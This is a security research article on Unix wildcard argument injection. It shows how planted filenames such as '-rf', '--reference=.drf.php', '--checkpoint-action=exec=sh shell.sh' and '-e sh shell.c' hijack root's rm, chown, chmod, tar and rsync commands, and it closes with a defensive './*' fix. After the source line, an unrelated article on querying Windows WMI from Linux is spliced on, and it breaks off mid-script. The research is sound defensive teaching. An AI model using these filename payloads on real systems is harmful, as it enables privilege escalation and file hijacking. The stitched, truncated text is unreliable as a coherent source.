Back To The Future: Unix Wildcards Gone Wild
============================================

- Leon Juranic <email@example.com>
- Creation Date: 04/20/2013
- Release Date: 06/25/2014

Table Of Contents:

===[ 1. Introduction
===[ 2. Unix Wildcards For Dummies
===[ 3. Wildcard Wilderness
===[ 4. Something more useful...
        4.1 Chown file reference trick (file owner hijacking)
        4.2 Chmod file reference trick
        4.3 Tar arbitrary command execution
        4.4 Rsync arbitrary command execution
===[ 5. Conclusion


===[ 1. Introduction

First of all, this article has nothing to do with modern hacking techniques like ASLR bypass, ROP exploits, 0day remote kernel exploits or Chrome's Chain-14-Different-Bugs-To-Get-There... Nope, nothing of the above. This article covers one interesting old-school Unix hacking technique that still works today, in 2013. It is a technique of which, to my surprise, even many security-minded people haven't heard. That is probably because nobody ever really talked about it before.

I decided to write on this subject because, to me personally, it's pretty funny to see what can be done with simple Unix wildcard poisoning tricks. So what you can expect from this article is a collection of neat *nix hacking tricks that, as far as I know, somehow didn't emerge earlier. If you wonder how basic Unix tools like 'tar' or 'chown' can lead to full system compromise, keep on reading.

Ladies and gentlemen, take your seats, fasten your belts and hold on tight, because we're going straight back to the 80's, right to Unix shell hacking... (Is that bad-hair-rock/groovy disco music playing in the background? I think sooo...)

===[ 2. Unix Wildcards For Dummies

If you already know what Unix wildcards are, and how (and why) they are used in shell scripting, you should skip this part. However, we will include a wildcard definition here for the sake of consistency and for potential newcomers.
A wildcard is a character, or set of characters, that can be used as a replacement for some range/class of characters. Wildcards are interpreted by the shell before any other action is taken.

Some shell wildcards:

*    An asterisk matches any number of characters in a filename, including none.
?    The question mark matches any single character.
[ ]  Brackets enclose a set of characters, any one of which may match a single character at that position.
-    A hyphen used within [ ] denotes a range of characters.
~    A tilde at the beginning of a word expands to the name of your home directory. If you append another user's login name to the character, it refers to that user's home directory.

Basic examples of wildcard usage:

# ls *.php    - List all files with the PHP extension
# rm *.gz     - Delete all GZIP files
# cat backup* - Show the content of all files whose names begin with the string 'backup'
# ls test?    - List all files whose names begin with the string 'test' followed by exactly one additional character

===[ 3. Wildcard Wilderness

Wildcards, as their name states, are "wild" by nature, but moreover, in some cases, wildcards can go berserk. During the initial phase of playing with these interesting wildcard tricks, I talked with a dozen old-school Unix admins and security people, just to find out how many of them know about wildcard tricks and the potential danger they pose. To my surprise, only two of 20 people stated that they know it is not wise to use wildcards, particularly in the 'rm' command, because someone could abuse them with an "argument-like filename". One of them said that he had heard of that years ago in some basic Linux admin course. Funny.

The simple trick behind this technique is that when shell wildcards are used, especially the asterisk (*), the Unix shell will pass files whose names begin with a hyphen (-) character to the executed command/program as command-line arguments. That leaves space for a variation of the classic channeling attack.
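To see that the expansion really happens in the shell, before the invoked program ever runs, here is a harmless sketch you can run in any scratch directory (the temp directory and filenames are just illustrative):

```shell
# The shell expands '*.txt' into a list of filenames; printf never sees the
# asterisk, only the already-expanded arguments.
set -eu
dir=$(mktemp -d)
cd "$dir"
touch alpha.txt beta.txt
printf '%s\n' *.txt     # printf receives two separate arguments
cd / && rm -r "$dir"
```

The program on the receiving end has no way to tell whether an argument was typed by the user or produced by wildcard expansion, which is exactly the property the rest of this article abuses.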
A channeling problem arises when different kinds of information channels are combined into a single channel. The practical case in this particular technique is combining arguments and filenames, as different "channels", into one, through the use of shell wildcards.

Let's check one very basic wildcard argument injection example.

[root@defensecode public]# ls -al
total 20
drwxrwxr-x.  5 leon   leon   4096 Oct 28 17:04 .
drwx------. 22 leon   leon   4096 Oct 28 16:15 ..
drwxrwxr-x.  2 leon   leon   4096 Oct 28 17:04 DIR1
drwxrwxr-x.  2 leon   leon   4096 Oct 28 17:04 DIR2
drwxrwxr-x.  2 leon   leon   4096 Oct 28 17:04 DIR3
-rw-rw-r--.  1 leon   leon      0 Oct 28 17:03 file1.txt
-rw-rw-r--.  1 leon   leon      0 Oct 28 17:03 file2.txt
-rw-rw-r--.  1 leon   leon      0 Oct 28 17:03 file3.txt
-rw-rw-r--.  1 nobody nobody    0 Oct 28 16:38 -rf

We have a directory with a few subdirectories and a few files in it. There is also a file named '-rf', owned by the user 'nobody'. Now, let's run the 'rm *' command and check the directory content again.

[root@defensecode public]# rm *
[root@defensecode public]# ls -al
total 8
drwxrwxr-x.  2 leon   leon   4096 Oct 28 17:05 .
drwx------. 22 leon   leon   4096 Oct 28 16:15 ..
-rw-rw-r--.  1 nobody nobody    0 Oct 28 16:38 -rf

The directory is totally empty, except for the '-rf' file. All files and directories were recursively deleted, and it's pretty obvious what happened... When we ran 'rm' with the asterisk argument, all filenames in the current directory were passed to 'rm' as command-line arguments, exactly as in the following line:

[user@defensecode WILD]$ rm DIR1 DIR2 DIR3 file1.txt file2.txt file3.txt -rf

Since there is a file named '-rf' in the current directory, 'rm' got the -rf option as the last argument, and all files in the current directory were recursively deleted.
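The whole experiment can be reproduced safely inside a throwaway directory; the sketch below (filenames are illustrative, GNU rm assumed) touches nothing outside the temp directory it creates:

```shell
# Safe reproduction of the 'rm *' trick in a throwaway directory.
set -eu
dir=$(mktemp -d)
cd "$dir"
mkdir DIR1
touch file1.txt
touch -- '-rf'             # the boobytrapped filename; '--' stops option parsing
rm * 2>/dev/null || true   # the glob hands '-rf' to rm as an option
ls -A                      # only '-rf' survives
cd / && rm -rf "$dir"
```

Note the attacker needs `touch -- '-rf'` (or `touch ./-rf`) to create the trap file in the first place, for exactly the same option-parsing reason.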
We can also check that with strace:

[leon@defensecode WILD]$ strace rm *
execve("/bin/rm", ["rm", "DIR1", "DIR2", "DIR3", "file1.txt", "file2.txt", "file3.txt", "-rf"], [/* 25 vars */]) = 0
                                                                            ^- HERE

Now we know how it's possible to inject arbitrary arguments into Unix shell programs. In the following chapter we will discuss how we can abuse that behavior to do much more than just recursively delete files.

===[ 4. Something more useful...

Now that we know how to inject arbitrary arguments into shell commands, let's demonstrate a few examples that are more useful than recursive file unlinking. When I first stumbled across these wildcard tricks, I started looking for basic, common Unix programs that could be seriously affected by arbitrary and unexpected arguments. In real-world cases, the following examples could be abused in the form of direct interactive shell poisoning, or through commands started from cron jobs, shell scripts, web applications, and so on. In all examples below, the attacker is hidden behind the 'leon' account, and the victim is, of course, the root account.

===[ 4.1 Chown file reference trick (file owner hijacking)

The first really interesting target I stumbled across is 'chown'. Let's say we have a publicly writable directory with a bunch of PHP files in it, and the root user wants to change the owner of all PHP files to 'nobody'. Pay attention to the file owners in the following file list.

[root@defensecode public]# ls -al
total 52
drwxrwxrwx.  2 user user 4096 Oct 28 17:47 .
drwx------. 22 user user 4096 Oct 28 17:34 ..
-rw-rw-r--.  1 user user   66 Oct 28 17:36 admin.php
-rw-rw-r--.  1 user user   34 Oct 28 17:35 ado.php
-rw-rw-r--.  1 user user   80 Oct 28 17:44 config.php
-rw-rw-r--.  1 user user  187 Oct 28 17:44 db.php
-rw-rw-r--.  1 user user  201 Oct 28 17:35 download.php
-rw-r--r--.  1 leon leon    0 Oct 28 17:40 .drf.php
-rw-rw-r--.  1 user user   43 Oct 28 17:35 file1.php
-rw-rw-r--.  1 user user   56 Oct 28 17:47 footer.php
-rw-rw-r--.  1 user user  357 Oct 28 17:36 global.php
-rw-rw-r--.  1 user user  225 Oct 28 17:35 header.php
-rw-rw-r--.  1 user user  117 Oct 28 17:35 inc.php
-rw-rw-r--.  1 user user  111 Oct 28 17:38 index.php
-rw-rw-r--.  1 leon leon    0 Oct 28 17:45 --reference=.drf.php
-rw-rw----.  1 user user   66 Oct 28 17:35 password.inc.php
-rw-rw-r--.  1 user user   94 Oct 28 17:35 script.php

Files in this public directory are mostly owned by the user named 'user', and root will now change that to 'nobody'.

[root@defensecode public]# chown -R nobody:nobody *.php

Let's see who owns the files now...

[root@defensecode public]# ls -al
total 52
drwxrwxrwx.  2 user user 4096 Oct 28 17:47 .
drwx------. 22 user user 4096 Oct 28 17:34 ..
-rw-rw-r--.  1 leon leon   66 Oct 28 17:36 admin.php
-rw-rw-r--.  1 leon leon   34 Oct 28 17:35 ado.php
-rw-rw-r--.  1 leon leon   80 Oct 28 17:44 config.php
-rw-rw-r--.  1 leon leon  187 Oct 28 17:44 db.php
-rw-rw-r--.  1 leon leon  201 Oct 28 17:35 download.php
-rw-r--r--.  1 leon leon    0 Oct 28 17:40 .drf.php
-rw-rw-r--.  1 leon leon   43 Oct 28 17:35 file1.php
-rw-rw-r--.  1 leon leon   56 Oct 28 17:47 footer.php
-rw-rw-r--.  1 leon leon  357 Oct 28 17:36 global.php
-rw-rw-r--.  1 leon leon  225 Oct 28 17:35 header.php
-rw-rw-r--.  1 leon leon  117 Oct 28 17:35 inc.php
-rw-rw-r--.  1 leon leon  111 Oct 28 17:38 index.php
-rw-rw-r--.  1 leon leon    0 Oct 28 17:45 --reference=.drf.php
-rw-rw----.  1 leon leon   66 Oct 28 17:35 password.inc.php
-rw-rw-r--.  1 leon leon   94 Oct 28 17:35 script.php

Something is not right... What happened? Somebody got drunk here. The superuser tried to change the file owners to the user:group 'nobody', but somehow all files are now owned by the user 'leon'. If we take a closer look, this directory previously contained just the following two files created and owned by the user 'leon'.

-rw-r--r--.  1 leon leon    0 Oct 28 17:40 .drf.php
-rw-rw-r--.  1 leon leon    0 Oct 28 17:45 --reference=.drf.php

The thing is that the wildcard used on the 'chown' command line picked up the arbitrary '--reference=.drf.php' file and passed it to chown as an option. Let's check the chown manual page (man chown):

--reference=RFILE
       use RFILE's owner and group rather than specifying OWNER:GROUP values

So in this case, the '--reference' option to 'chown' overrides the 'nobody:nobody' specified by root, and the new owner of the files in this directory becomes exactly the same as the owner of '.drf.php', which is in this case the user 'leon'. Just for the record, '.drf' is short for Dummy Reference File. :)

To conclude, the --reference option can be abused to change the ownership of files to an arbitrary user. If we pointed --reference at some other file, one owned by a user other than 'leon', that user would become the owner of all files in this directory. With this simple chown parameter pollution, we can trick root into changing the ownership of files to arbitrary users, and practically "hijack" files that are of interest to us. Even better, if the user 'leon' had previously created a symbolic link in that directory pointing to, say, /etc/shadow, the ownership of /etc/shadow would also be changed to the user 'leon'.

===[ 4.2 Chmod file reference trick

Another interesting attack vector, similar to the 'chown' attack described above, is 'chmod'. Chmod also has a --reference option that can be abused to set arbitrary permissions on files selected with the asterisk wildcard.

Chmod manual page (man chmod):

--reference=RFILE
       use RFILE's mode instead of MODE values

An example is presented below.

[root@defensecode public]# ls -al
total 68
drwxrwxrwx.  2 user user  4096 Oct 29 00:41 .
drwx------. 24 user user  4096 Oct 28 18:32 ..
-rw-rw-r--.  1 user user 20480 Oct 28 19:13 admin.php
-rw-rw-r--.  1 user user    34 Oct 28 17:47 ado.php
-rw-rw-r--.  1 user user   187 Oct 28 17:44 db.php
-rw-rw-r--.  1 user user   201 Oct 28 17:43 download.php
-rwxrwxrwx.  1 leon leon     0 Oct 29 00:40 .drf.php
-rw-rw-r--.  1 user user    43 Oct 28 17:35 file1.php
-rw-rw-r--.  1 user user    56 Oct 28 17:47 footer.php
-rw-rw-r--.  1 user user   357 Oct 28 17:36 global.php
-rw-rw-r--.  1 user user   225 Oct 28 17:37 header.php
-rw-rw-r--.  1 user user   117 Oct 28 17:36 inc.php
-rw-rw-r--.  1 user user   111 Oct 28 17:38 index.php
-rw-r--r--.  1 leon leon     0 Oct 29 00:41 --reference=.drf.php
-rw-rw-r--.  1 user user    94 Oct 28 17:38 script.php

The superuser will now try to set mode 000 on all files.

[root@defensecode public]# chmod 000 *

Let's check the permissions on the files...

[root@defensecode public]# ls -al
total 68
drwxrwxrwx.  2 user user  4096 Oct 29 00:41 .
drwx------. 24 user user  4096 Oct 28 18:32 ..
-rwxrwxrwx.  1 user user 20480 Oct 28 19:13 admin.php
-rwxrwxrwx.  1 user user    34 Oct 28 17:47 ado.php
-rwxrwxrwx.  1 user user   187 Oct 28 17:44 db.php
-rwxrwxrwx.  1 user user   201 Oct 28 17:43 download.php
-rwxrwxrwx.  1 leon leon     0 Oct 29 00:40 .drf.php
-rwxrwxrwx.  1 user user    43 Oct 28 17:35 file1.php
-rwxrwxrwx.  1 user user    56 Oct 28 17:47 footer.php
-rwxrwxrwx.  1 user user   357 Oct 28 17:36 global.php
-rwxrwxrwx.  1 user user   225 Oct 28 17:37 header.php
-rwxrwxrwx.  1 user user   117 Oct 28 17:36 inc.php
-rwxrwxrwx.  1 user user   111 Oct 28 17:38 index.php
-rw-r--r--.  1 leon leon     0 Oct 29 00:41 --reference=.drf.php
-rwxrwxrwx.  1 user user    94 Oct 28 17:38 script.php

What happened? Instead of 000, all files are now set to mode 777 because of the '--reference' option supplied through a file name. Once again, the file .drf.php, owned by the user 'leon' and set to mode 777, was used as the reference file, and since the --reference option was supplied, all files were set to mode 777. Besides the --reference option, an attacker can also create a file named '-R' to change permissions on files in all subdirectories recursively.

===[ 4.3 Tar arbitrary command execution

The previous example is a nice case of file ownership hijacking.
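The --reference trick is easy to reproduce safely as an unprivileged user with chmod; the sketch below (GNU coreutils assumed, filenames invented) runs entirely inside a temp directory:

```shell
# Reproduce the chmod --reference trick in a scratch directory.
set -eu
dir=$(mktemp -d)
cd "$dir"
touch victim.php .drf.php
chmod 777 .drf.php                 # attacker's reference file, mode 777
touch -- '--reference=.drf.php'    # attacker's option-shaped filename
# The glob expands to: chmod 000 --reference=.drf.php victim.php
# GNU chmod takes the mode from .drf.php and even treats '000' as a filename.
chmod 000 *.php 2>/dev/null || true
stat -c '%a' victim.php            # 777, not 0
cd / && rm -rf "$dir"
```

Note that once --reference is parsed, the intended '000' operand is no longer a mode at all; chmod looks for a file literally named '000', which is why the command also emits an error that a careless administrator may ignore.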
Now, let's move on to even more interesting stuff, like arbitrary command execution. Tar is a very common Unix program for creating and extracting archives. Common usage for, say, creating an archive is:

[root@defensecode public]# tar cvvf archive.tar *

So, what's the problem with 'tar'? The thing is that tar has many options, and among them there are some pretty interesting ones from an arbitrary parameter injection point of view. Let's check the tar manual page (man tar):

--checkpoint[=NUMBER]
       display progress messages every NUMBERth record (default 10)

--checkpoint-action=ACTION
       execute ACTION on each checkpoint

There is the '--checkpoint-action' option, which specifies a program to be executed when a checkpoint is reached. Basically, that allows us arbitrary command execution. Check the following directory:

[root@defensecode public]# ls -al
total 72
drwxrwxrwx.  2 user user  4096 Oct 28 19:34 .
drwx------. 24 user user  4096 Oct 28 18:32 ..
-rw-rw-r--.  1 user user 20480 Oct 28 19:13 admin.php
-rw-rw-r--.  1 user user    34 Oct 28 17:47 ado.php
-rw-r--r--.  1 leon leon     0 Oct 28 19:19 --checkpoint=1
-rw-r--r--.  1 leon leon     0 Oct 28 19:17 --checkpoint-action=exec=sh shell.sh
-rw-rw-r--.  1 user user   187 Oct 28 17:44 db.php
-rw-rw-r--.  1 user user   201 Oct 28 17:43 download.php
-rw-rw-r--.  1 user user    43 Oct 28 17:35 file1.php
-rw-rw-r--.  1 user user    56 Oct 28 17:47 footer.php
-rw-rw-r--.  1 user user   357 Oct 28 17:36 global.php
-rw-rw-r--.  1 user user   225 Oct 28 17:37 header.php
-rw-rw-r--.  1 user user   117 Oct 28 17:36 inc.php
-rw-rw-r--.  1 user user   111 Oct 28 17:38 index.php
-rw-rw-r--.  1 user user    94 Oct 28 17:38 script.php
-rwxr-xr-x.  1 leon leon    12 Oct 28 19:17 shell.sh

Now, for example, the root user wants to create an archive of all files in the current directory.
[root@defensecode public]# tar cf archive.tar *
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Boom! What happened? The /usr/bin/id command got executed! We've just achieved arbitrary command execution under root privileges. Once again, there are a few files created by the user 'leon'.

-rw-r--r--.  1 leon leon  0 Oct 28 19:19 --checkpoint=1
-rw-r--r--.  1 leon leon  0 Oct 28 19:17 --checkpoint-action=exec=sh shell.sh
-rwxr-xr-x.  1 leon leon 12 Oct 28 19:17 shell.sh

The options '--checkpoint=1' and '--checkpoint-action=exec=sh shell.sh' were passed to the 'tar' program as command-line options. Basically, they tell tar to execute the shell.sh shell script as soon as the first checkpoint is reached.

[root@defensecode public]# cat shell.sh
/usr/bin/id

So, with this tar argument pollution, we can execute arbitrary commands with the privileges of the user that runs tar, as demonstrated on the 'root' account above.

===[ 4.4 Rsync arbitrary command execution

Rsync is "a fast, versatile, remote (and local) file-copying tool" that is very common on Unix systems. If we check the 'rsync' manual page, we can again find options that can be abused for arbitrary command execution. From the rsync manual:

"You use rsync in the same way you use rcp. You must specify a source and a destination, one of which may be remote."

Interesting rsync options from the manual:

-e, --rsh=COMMAND
       specify the remote shell to use

--rsync-path=PROGRAM
       specify the rsync to run on remote machine

Let's abuse an example taken directly from the 'rsync' manual page. The following command copies all C files in the local directory to the '/src' directory on a remote host 'foo'.
# rsync -t *.c foo:src/

Directory content:

[root@defensecode public]# ls -al
total 72
drwxrwxrwx.  2 user user  4096 Mar 28 04:47 .
drwx------. 24 user user  4096 Oct 28 18:32 ..
-rwxr-xr-x.  1 user user 20480 Oct 28 19:13 admin.php
-rwxr-xr-x.  1 user user    34 Oct 28 17:47 ado.php
-rwxr-xr-x.  1 user user   187 Oct 28 17:44 db.php
-rwxr-xr-x.  1 user user   201 Oct 28 17:43 download.php
-rw-r--r--.  1 leon leon     0 Mar 28 04:45 -e sh shell.c
-rwxr-xr-x.  1 user user    43 Oct 28 17:35 file1.php
-rwxr-xr-x.  1 user user    56 Oct 28 17:47 footer.php
-rwxr-xr-x.  1 user user   357 Oct 28 17:36 global.php
-rwxr-xr-x.  1 user user   225 Oct 28 17:37 header.php
-rwxr-xr-x.  1 user user   117 Oct 28 17:36 inc.php
-rwxr-xr-x.  1 user user   111 Oct 28 17:38 index.php
-rwxr-xr-x.  1 user user    94 Oct 28 17:38 script.php
-rwxr-xr-x.  1 leon leon    31 Mar 28 04:45 shell.c

Now root will try to copy all C files to the remote server.

[root@defensecode public]# rsync -t *.c foo:src/
rsync: connection unexpectedly closed (0 bytes received so far) [sender]
rsync error: error in rsync protocol data stream (code 12) at io.c(601) [sender=3.0.8]

Let's see what happened...

[root@defensecode public]# ls -al
total 76
drwxrwxrwx.  2 user user  4096 Mar 28 04:49 .
drwx------. 24 user user  4096 Oct 28 18:32 ..
-rwxr-xr-x.  1 user user 20480 Oct 28 19:13 admin.php
-rwxr-xr-x.  1 user user    34 Oct 28 17:47 ado.php
-rwxr-xr-x.  1 user user   187 Oct 28 17:44 db.php
-rwxr-xr-x.  1 user user   201 Oct 28 17:43 download.php
-rw-r--r--.  1 leon leon     0 Mar 28 04:45 -e sh shell.c
-rwxr-xr-x.  1 user user    43 Oct 28 17:35 file1.php
-rwxr-xr-x.  1 user user    56 Oct 28 17:47 footer.php
-rwxr-xr-x.  1 user user   357 Oct 28 17:36 global.php
-rwxr-xr-x.  1 user user   225 Oct 28 17:37 header.php
-rwxr-xr-x.  1 user user   117 Oct 28 17:36 inc.php
-rwxr-xr-x.  1 user user   111 Oct 28 17:38 index.php
-rwxr-xr-x.  1 user user    94 Oct 28 17:38 script.php
-rwxr-xr-x.  1 leon leon    31 Mar 28 04:45 shell.c
-rw-r--r--.  1 root root   101 Mar 28 04:49 shell_output.txt

There were two files owned by the user 'leon', as listed below.

-rw-r--r--.  1 leon leon  0 Mar 28 04:45 -e sh shell.c
-rwxr-xr-x.  1 leon leon 31 Mar 28 04:45 shell.c

After the 'rsync' run, a new file, shell_output.txt, owned by root, was created in the same directory.

-rw-r--r--.  1 root root 101 Mar 28 04:49 shell_output.txt

If we check its content, the following data is found.

[root@defensecode public]# cat shell_output.txt
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

The trick is that, because of the '*.c' wildcard, 'rsync' got the '-e sh shell.c' option on its command line, so shell.c was executed upon 'rsync' start. The content of shell.c is presented below.

[root@defensecode public]# cat shell.c
/usr/bin/id > shell_output.txt

===[ 5. Conclusion

The techniques discussed in this article can be applied in different forms to various popular Unix tools. In real-world attacks, arbitrary shell options/arguments could be hidden among regular files and not easily spotted by an administrator; moreover, in the case of cron jobs, shell scripts, or web applications that call shell commands, that doesn't even matter. There are probably many more popular Unix tools susceptible to the wildcard attacks described above.

Thanks to Hrvoje Spoljar and SEC Consult for a few ideas regarding this document.
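As a closing practical note, the whole class of tricks above is defeated by never letting an expanded filename start with a hyphen: prefix wildcards with './' (most utilities also honor '--' as an end-of-options marker, but './*' works everywhere). A minimal demonstration, run in a scratch directory:

```shell
# './*' makes every expanded name start with './', so nothing is parsed
# as an option and the boobytrapped '-rf' file is deleted like any other.
set -eu
dir=$(mktemp -d)
cd "$dir"
touch file1.txt
touch -- '-rf'
rm ./*            # expands to: rm ./-rf ./file1.txt
ls -A | wc -l     # 0 -- both regular files gone, no recursion happened
cd / && rm -rf "$dir"
```

The same habit applies to scripts and cron jobs: 'tar cf archive.tar ./*' or 'rsync -t ./*.c foo:src/' would not have been exploitable.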
Source: exploit-db.com
For many people, the idea of using Linux as a low-cost network management platform can be highly seductive. As the argument goes, even the most rudimentary Linux distributions include the components that are needed to build a modest management console, with Net-SNMP extracting management information from devices on the network, RRDtool storing and graphing the collected data, and one of the many Linux-based network management packages providing a Web-based point-and-click interface to the system as a whole.
For the most part, this approach can even work fairly well for basic monitoring tasks, although it also has its limits. In particular, most network devices do not publish all of their available management data through SNMP, and getting to the additional data typically requires the use of an alternative management interface.
This can even be a challenge with Linux itself, since many of the system variables in the /proc filesystem are not published over SNMP by default, while many of the web and email application servers that are commonly used with Linux do not have any SNMP interfaces at all. If you need to capture any of that data, you'll need to find a way to extract it from log files or process-management tools, and then import it into your management station through a secondary interface.
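On Linux itself, the usual way to bridge that gap is Net-SNMP's `extend` mechanism, which publishes the output of an arbitrary script under NET-SNMP-EXTEND-MIB. A minimal sketch is below; the script path and the `load1` token are invented for illustration, and the one-liner simply pulls a value (the 1-minute load average) straight from /proc:

```shell
# Hypothetical collector script, e.g. /usr/local/bin/loadavg1.sh (invented
# path). It would be wired into snmpd via a line like this in snmpd.conf:
#   extend load1 /usr/local/bin/loadavg1.sh
# after which the value appears under NET-SNMP-EXTEND-MIB::nsExtendOutput1Line.
awk '{ print $1 }' /proc/loadavg   # prints the 1-minute load average
```

Each metric you want exported this way needs its own `extend` line, which is exactly the kind of per-variable tedium the paragraph above alludes to.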
But while this can be tedious for systems like Linux, it's a huge problem for the systems and services that use Windows Management Instrumentation (WMI) as their primary management subsystem, since there has not historically been any way to query WMI from Linux directly (see sidebar at right). Instead, administrators who have committed themselves to Linux-based management consoles have had to rely on gateway or proxy technologies that query Windows systems for the desired data on behalf of the management station. For Windows-heavy networks, the path of least resistance has simply been to use Windows-based management platforms that can access the data directly, and forgo the Linux management station altogether.
In practice, there are a variety of ways to pull WMI data into Linux-based management tools, many of which are discussed throughout the remainder of this article. However, while most of these tools are useful for extracting some degree of data from WMI, they also have unique operating considerations which can affect their utility in unexpected ways. For example, some of the solutions require new software to be installed at the management station, on a gateway device, or at each of the Windows hosts that will be monitored, and some of them may require modifications to the security permissions on some of those systems as well. Similarly, the different solutions can expose widely varying amounts of data, which not only determines the functionality of a particular package, but also introduces additional security considerations.
The Windows SNMP Agent
The simplest way to get data from WMI into Linux management stations is to go through the SNMP agent that is included with the Windows operating system, although there are some significant limits on the information that is available through this interface. More accurately, the principal restriction with the Windows SNMP agent is that it does not provide much in the way of Windows-specific data.
For example, the HOST-RESOURCES-MIB defines basic CPU utilization metrics that show the average processor utilization levels for the last minute of activity, but that is all it provides. The problem here is that the standardized data just isn't very useful, especially compared to the CPU utilization data from the WMI performance counters, which tell us how many tasks are currently in the process queue, how much of the load is from system tasks versus user tasks, and much more. Unfortunately, none of the interesting and useful data is available through the native SNMP agent.
The good news is that some third parties have stepped up to fill this void, and it's possible to get at the interesting data via SNMP by using aftermarket extensions. The biggest name in this space is SNMP Informant, which is the brand name for a series of products ranging from a basic freeware extension that exposes a limited amount of operating system data all the way up to a commercial multi-extension that exposes huge tracts of data from the operating system and add-on packages like Microsoft Exchange and SQL Server (among others).
SNMP Informant works by strongly data-typing the core performance counter objects, and then mapping predefined OIDs against those objects, thereby allowing administrators to make explicit and clean references to system-level objects in a consistent and reliable way. However, the downside to this approach is that every OID in the extension must be predefined; SNMP Informant focuses on several very important areas but does not attempt to expose the entire WMI subsystem to SNMP. This means that if you need to access performance counters or some other piece of WMI data that SNMP Informant does not already publish, you have to look elsewhere.
One interesting extension that has appeared in this space recently is the freeware SnmpTools, which purports to allow mapping administrator-defined OIDs to a variety of data sources, including hard-coded string values, dynamic performance counter objects in WMI, and even dynamic output from text-based scripts and programs. Although the WMI-specific part of the extension is limited to performance counter objects, it's theoretically possible to query other parts of the subsystem through the use of a local script and return the data through the command interface.
Another angle on this space is that many of the server hardware vendors provide their own SNMP extensions for Windows as a way to publish management information about the server hardware. When added to the other extensions discussed above, this can really round out the data that is available through the stock SNMP agent.
The general downside to this class of tools is that they have to be installed on every Windows system, since they extend the SNMP agent on the local host. However, they do not require any new software on the Linux management station, since they tend to work seamlessly with existing SNMP interfaces. These technologies also do not typically require any significant changes to existing security models, since the native SNMP agent's authentication services will continue to be used. On the other hand, the lack of encryption in SNMP means that adding extensions that publish more data will result in more data being available for eavesdroppers to discover.
WBEM and WMI
Just as SNMP is generally the preferred management technology for Linux systems to use when querying Windows devices, at the other end of the spectrum WMI is the most natural technology to use when managing Windows systems and services. Thus, if Windows cannot be made to speak SNMP adequately, another option is to make Linux speak WMI. But as stated in the introduction, WMI has not historically been available to Linux systems due to a variety of technological issues. However, it has long been possible to make Linux systems speak WBEM, and since the principal difference between WBEM and WMI is the transfer protocol in use (again, see sidebar), all that's really needed to expose WMI to Linux is a WBEM listener for Windows and a WBEM client for Linux.
There are a couple of options for running a WBEM listener on Windows. For one, the Open Group has an open-source WBEM implementation called OpenPegasus with a standalone WBEM-to-WMI gateway component called WMI Mapper, which listens for incoming HTTP/WBEM queries on the standardized ports, processes the requests as WMI queries on the destination system, and then returns the answer data to the original requester. Unfortunately, WMI Mapper is only available from the OpenPegasus web site as raw source code, which can be an issue for many organizations. However, the HP Systems Insight Manager server-management toolkit provides a prebuilt version of WMI Mapper as a separate downloadable add-on package.
Another option for adding WBEM capabilities to Windows comes from the IBM Systems Director server-management suite. Specifically, IBM Systems Director provides Windows agents with a comprehensive WBEM implementation that can also be used to query WMI on the local system. These agents can carry a lot of overhead, but they can also add a tremendous amount of manageability to their host systems. Furthermore, organizations that are thinking about using WBEM on their other platforms can look at the Director agents as a way to get a consistent WBEM interface on multiple platforms simultaneously.
Once one of these packages has been installed and configured, the only remaining requirement is a WBEM client for Linux that can generate queries and return formatted data to the management console. There are a handful of WBEM toolkits available for Linux (including tools that are included in the aforementioned WBEM-based server-management consoles), but one simple utility for this purpose is wbemcli from the Standards-Based Linux Instrumentation (SBLIM) suite, which allows you to generate requests for named resources and apply basic formatting to the response data using command-line options. Some of the common Linux distributions already include the sblim-wbemcli package, but it can also be downloaded from SourceForge.
There is also the somewhat-recent option of running a WMI client directly on Linux, bypassing all of the intermediate technologies altogether. Specifically, the Linux-based Zenoss management platform provides a utility called wmic, which uses the Samba4 libraries to access Windows and interact with WMI directly. Using the wmic utility, it's possible to retrieve just about any object from anywhere in WMI (the author uses it to generate custom graphs from Everest sensor readings stored in WMI), although you have to generate the queries using WQL (WMI Query Language, which is very similar to SQL). wmic is packaged as a separate program in some Linux distributions, but is also included in the open-source version of Zenoss Core.
Of all the options for getting management data out of WMI, wmic is clearly the simplest and cleanest way to do it. However, it's also important to recognize that wmic is only useful for querying WMI, and it is unable to engage or manipulate WMI objects. If you need that level of access then one of the WBEM approaches is going to be your only option for now. Another advantage that WBEM has over wmic is the fact that you can deploy WBEM servers on your Linux systems so that all of your devices are presenting fairly consistent high-level management interfaces. This is not something that should be embraced casually, but it is an important and compelling opportunity that should not be dismissed blithely either.
In terms of deployment, the Director Agent is the only technology mentioned that requires new software to be installed on the Windows systems for the data to be accessible to Linux management consoles. The OpenPegasus/HP WMI Mapper gateway is able to issue WMI requests for objects on local and remote Windows systems, so it only needs to be installed on a single gateway device. wmic does not need any new software on any Windows device. All of these solutions require client-side software of some kind on the Linux management console.
All of these solutions also require changes to Windows' security permissions in order to function, particularly in the areas of WMI object permissions, and in the case of wmic there are likely to be changes to DCOM permissions as well (the default Windows permissions only allow administrative users to issue remote queries, which is not viable for most networks).
Remote Command Execution
If SNMP and WBEM/WMI all prove to be unsatisfactory for some reason, then it's time to explore alternative management interfaces. Luckily, this tends to be fairly straightforward on Linux-based management systems; everything uses the command-line to move data around already, so calling an alternative management tool is theoretically as simple as replacing the snmpget command with an appropriate substitute, and ensuring that properly-formatted response strings are generated.
As was alluded to in the introduction, this kind of alternative command model is sometimes needed in order to pull interesting data from the local Linux system itself. For example, if you need to routinely extract management data from a local email server's log file, then you will probably need to execute an arbitrary script that returns the required data and then pass the formatted results back to the management station. By extension, if you need to gather this data from all of the Linux hosts on your network, then one option worth considering is to simply distribute the script to each of them, and then use a local program to execute the remote scripts as needed. This same model can also be made to work with Windows, and in fact is actively embraced by some popular management toolkits.
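As a sketch of the sort of per-host collector script involved (the log path and the "reject" marker here are invented for illustration; adjust for your MTA and log format), it can be as small as:

```shell
#!/bin/sh
# Minimal sketch of a per-host collector script. The log path and the
# "reject" marker are invented for illustration; adjust for your MTA.
count_rejects() {
    log="$1"
    # grep -c exits non-zero when there are no matches; treat that as 0.
    c=$(grep -c 'reject' "$log" 2>/dev/null) || c=0
    # Emit one formatted key=value line the management station consumes.
    echo "mail_rejects=$c"
}

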